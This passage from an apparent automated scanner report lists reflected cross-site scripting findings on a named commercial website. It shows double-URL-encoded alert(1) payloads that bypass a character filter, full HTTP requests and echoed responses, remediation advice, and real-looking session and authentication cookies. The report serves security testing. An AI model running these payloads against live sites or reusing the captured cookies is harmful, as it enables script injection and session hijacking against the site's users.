       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/etc/medialib/docs/Sigma4097b";alert(1)//a35c3dc4905/General_Information/featured_products.Par.0001.File.tmp/featured_products.pdf","E404") ;
   </script>
...[SNIP]...

1.313. http://www.sigmaaldrich.com/etc/medialib/docs/Sigma/General_Information/featured_products.Par.0001.File.tmp/featured_products.pdf [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /etc/medialib/docs/Sigma/General_Information/featured_products.Par.0001.File.tmp/featured_products.pdf

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 99216%2522%253balert%25281%2529%252f%252fecff0d357a1 was submitted in the REST URL parameter 5. This input was echoed as 99216";alert(1)//ecff0d357a1 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 5 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /etc/medialib/docs/Sigma/General_Information99216%2522%253balert%25281%2529%252f%252fecff0d357a1/featured_products.Par.0001.File.tmp/featured_products.pdf HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:06:47 GMT
Content-Length: 29005
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/etc/medialib/docs/Sigma/General_Information99216";alert(1)//ecff0d357a1/featured_products.Par.0001.File.tmp/featured_products.pdf","E404") ;
   </script>
...[SNIP]...

1.314. http://www.sigmaaldrich.com/etc/medialib/docs/Sigma/General_Information/featured_products.Par.0001.File.tmp/featured_products.pdf [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /etc/medialib/docs/Sigma/General_Information/featured_products.Par.0001.File.tmp/featured_products.pdf

Issue detail

The value of REST URL parameter 6 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6d6f2%2522%253balert%25281%2529%252f%252ff32e0b56c1f was submitted in the REST URL parameter 6. This input was echoed as 6d6f2";alert(1)//f32e0b56c1f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 6 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /etc/medialib/docs/Sigma/General_Information/6d6f2%2522%253balert%25281%2529%252f%252ff32e0b56c1f/featured_products.pdf HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:06:49 GMT
Content-Length: 28970
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/etc/medialib/docs/Sigma/General_Information/6d6f2";alert(1)//f32e0b56c1f/featured_products.pdf","E404") ;
   </script>
...[SNIP]...

1.315. http://www.sigmaaldrich.com/etc/medialib/docs/Sigma/General_Information/proteomics.Par.0001.File.tmp/proteomics.pdf [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /etc/medialib/docs/Sigma/General_Information/proteomics.Par.0001.File.tmp/proteomics.pdf

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 15526%2522%253balert%25281%2529%252f%252fde752927cc0 was submitted in the REST URL parameter 1. This input was echoed as 15526";alert(1)//de752927cc0 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /etc15526%2522%253balert%25281%2529%252f%252fde752927cc0/medialib/docs/Sigma/General_Information/proteomics.Par.0001.File.tmp/proteomics.pdf HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:05:52 GMT
Content-Length: 28991
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/etc15526";alert(1)//de752927cc0/medialib/docs/Sigma/General_Information/proteomics.Par.0001.File.tmp/proteomics.pdf","E404") ;
   </script>
...[SNIP]...

1.316. http://www.sigmaaldrich.com/etc/medialib/docs/Sigma/General_Information/proteomics.Par.0001.File.tmp/proteomics.pdf [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /etc/medialib/docs/Sigma/General_Information/proteomics.Par.0001.File.tmp/proteomics.pdf

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 83654%2522%253balert%25281%2529%252f%252ffa18e8c1991 was submitted in the REST URL parameter 2. This input was echoed as 83654";alert(1)//fa18e8c1991 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /etc/medialib83654%2522%253balert%25281%2529%252f%252ffa18e8c1991/docs/Sigma/General_Information/proteomics.Par.0001.File.tmp/proteomics.pdf HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:05:59 GMT
Content-Length: 28991
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/etc/medialib83654";alert(1)//fa18e8c1991/docs/Sigma/General_Information/proteomics.Par.0001.File.tmp/proteomics.pdf","E404") ;
   </script>
...[SNIP]...

1.317. http://www.sigmaaldrich.com/etc/medialib/docs/Sigma/General_Information/proteomics.Par.0001.File.tmp/proteomics.pdf [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /etc/medialib/docs/Sigma/General_Information/proteomics.Par.0001.File.tmp/proteomics.pdf

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f9c94%2522%253balert%25281%2529%252f%252f2fbdb9aee17 was submitted in the REST URL parameter 3. This input was echoed as f9c94";alert(1)//2fbdb9aee17 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /etc/medialib/docsf9c94%2522%253balert%25281%2529%252f%252f2fbdb9aee17/Sigma/General_Information/proteomics.Par.0001.File.tmp/proteomics.pdf HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:06:05 GMT
Content-Length: 28991
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/etc/medialib/docsf9c94";alert(1)//2fbdb9aee17/Sigma/General_Information/proteomics.Par.0001.File.tmp/proteomics.pdf","E404") ;
   </script>
...[SNIP]...

1.318. http://www.sigmaaldrich.com/etc/medialib/docs/Sigma/General_Information/proteomics.Par.0001.File.tmp/proteomics.pdf [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /etc/medialib/docs/Sigma/General_Information/proteomics.Par.0001.File.tmp/proteomics.pdf

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8f05b%2522%253balert%25281%2529%252f%252f3afd928ea16 was submitted in the REST URL parameter 4. This input was echoed as 8f05b";alert(1)//3afd928ea16 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 4 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /etc/medialib/docs/Sigma8f05b%2522%253balert%25281%2529%252f%252f3afd928ea16/General_Information/proteomics.Par.0001.File.tmp/proteomics.pdf HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:06:13 GMT
Content-Length: 28991
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/etc/medialib/docs/Sigma8f05b";alert(1)//3afd928ea16/General_Information/proteomics.Par.0001.File.tmp/proteomics.pdf","E404") ;
   </script>
...[SNIP]...

1.319. http://www.sigmaaldrich.com/etc/medialib/docs/Sigma/General_Information/proteomics.Par.0001.File.tmp/proteomics.pdf [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /etc/medialib/docs/Sigma/General_Information/proteomics.Par.0001.File.tmp/proteomics.pdf

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload da5ff%2522%253balert%25281%2529%252f%252f88785618ad6 was submitted in the REST URL parameter 5. This input was echoed as da5ff";alert(1)//88785618ad6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 5 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /etc/medialib/docs/Sigma/General_Informationda5ff%2522%253balert%25281%2529%252f%252f88785618ad6/proteomics.Par.0001.File.tmp/proteomics.pdf HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
